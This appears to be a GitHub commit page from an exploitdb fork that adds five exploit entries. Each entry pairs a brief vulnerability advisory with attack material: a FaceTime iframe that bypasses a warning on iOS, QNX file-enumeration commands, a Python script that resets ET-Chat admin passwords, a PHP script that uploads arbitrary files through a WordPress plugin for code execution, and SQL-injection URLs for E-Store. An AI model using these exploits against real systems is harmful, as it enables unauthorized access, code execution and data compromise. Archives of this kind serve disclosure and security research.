forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
5 new exploits
- Loading branch information
Offensive Security
committed
Dec 29, 2015
1 parent
415f434
commit 73b5663
Showing
6 changed files
with
94 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,9 @@ | ||
source: http://www.securityfocus.com/bid/66108/info | ||
|
||
Apple iOS is affected by a security-bypass vulnerability. | ||
|
||
Successfully exploiting this issue may allow an attacker to bypass certain security warnings. This may aid in further attacks. | ||
|
||
These issues affect Apple iOS versions prior to 7.1. | ||
|
||
<iframe src="facetime-audio://user () host com"></iframe> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,24 @@ | ||
source: www.securityfocus.com/bid/66098/info | ||
|
||
QNX Phgrafx is prone to a file-enumeration weakness. | ||
|
||
An attacker can exploit this issue to enumerate the files present in the system's root directory; this may aid in further attacks. | ||
|
||
QNX 6.5.0 SP1, 6.5.0, 6.4.1, 6.3.0, and 6.2.0 are vulnerable; other versions may also be affected. | ||
|
||
$ id | ||
uid=100(user) gid=100 | ||
|
||
# directory /root/.ph exists: | ||
$ /usr/photon/bin/phgrafx -d /root/.ph | ||
load_display_conf(): No such file or directory | ||
|
||
# file /root/.profile exsts: | ||
$ /usr/photon/bin/phgrafx -d /root/.profile | ||
/root/.profile: opendir(): Not a directory | ||
load_display_conf(): Not a directory | ||
|
||
# /root/doesnotexist does not exist: | ||
$ /usr/photon/bin/phgrafx -d /root/doesnotexist | ||
/root/doesnotexist: opendir(): No such file or directory | ||
load_display_conf(): No such file or directory |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,26 @@ | ||
source: http://www.securityfocus.com/bid/66149/info | ||
|
||
ET - Chat is prone to a security bypass vulnerability. | ||
|
||
An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions; this may aid in launching further attacks. | ||
|
||
ET - Chat 3.0.7 is vulnerable; other versions may also be affected. | ||
|
||
#!/usr/bin/env python | ||
__author__ = 'IRH' | ||
print "Example: et-chat.py http://et-chat.com/chat" | ||
|
||
import urllib | ||
import sys | ||
|
||
url = sys.argv[1] | ||
url1 = url+"/?InstallIndex" | ||
url2 = url+"/?InstallMake" | ||
|
||
checkurl = urllib.urlopen(url1) | ||
|
||
if checkurl.code == 200 : | ||
urllib.urlopen(url2) | ||
print "Password Was Reseted!! Enjoy ;)" | ||
else: | ||
print "Site is not Vulnerability" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,19 @@ | ||
source: http://www.securityfocus.com/bid/66044/info | ||
|
||
Premium Gallery Manager plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. | ||
|
||
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks may also possible. | ||
|
||
<?php | ||
$uploadfile="Sh1Ne.php.jpg"; | ||
$ch = | ||
curl_init("http://www.example.com/wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.php"); | ||
curl_setopt($ch, CURLOPT_POST, true); | ||
curl_setopt($ch, CURLOPT_POSTFIELDS, | ||
array('Filedata'=>"@$uploadfile", | ||
'folder'=>'/wp-content/plugins/Premium_Gallery_Manager/uploadify/')); | ||
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | ||
$postResult = curl_exec($ch); | ||
curl_close($ch); | ||
print "$postResult"; | ||
?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,11 @@ | ||
source: http://www.securityfocus.com/bid/66100/info | ||
|
||
E-Store is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. | ||
|
||
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. | ||
|
||
E-Store 1.0 and 2.0 are vulnerable; other versions may also be affected. | ||
|
||
http://www.example.com/page.php?id=[SQL Injection] | ||
|
||
http://www.example.com/news.php?id=[SQL Injection] |